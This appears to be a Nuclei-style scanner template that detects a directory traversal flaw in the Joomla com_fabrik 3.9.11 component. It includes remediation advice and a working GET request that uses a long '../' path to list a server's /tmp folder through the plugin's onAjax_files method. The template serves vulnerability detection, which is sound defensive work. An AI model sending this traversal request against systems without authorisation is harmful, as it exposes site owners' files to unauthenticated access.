id: joomla-com-fabrik-lfi
info:
  name: Joomla! com_fabrik 3.9.11 - Directory Traversal
  author:
  - l0ne1y
  description: |-
    Joomla com_fabrik 3.9.11 component directory traversal vulnerability
    Directory traversal exists in Joomla com_fabrik 3.9.11, allowing an attacker to traverse the directory to obtain sensitive information without authentication.
  severity: high
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program:
    http://www.joomla.org/

    Temporary fix:
    1. Filter "." so that users cannot go back to the upper directory in the URL.
    2. Regular matching strictly determines the format of user input parameters, hard-codes or uniformly encodes the file name parameters passed by the user, performs whitelist control on file types, and rejects parameters containing malicious characters or null characters.
    3. Prohibit the system from providing directory traversal services, such as: php.ini configures open_basedir to limit file access scope.
    4. Save the file path to the database and let the user submit the file corresponding to the ID to download the file.
    5. Verify permissions before users download files.
requests:
- matchers:
  - type: word
    condition: and
    part: body
    words:
    - '"value":'
    - '"disable":false'
    - text
  - type: status
    status:
    - 200
  matchers-condition: and
  path:
  - '{{BaseURL}}/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/'
  method: GET
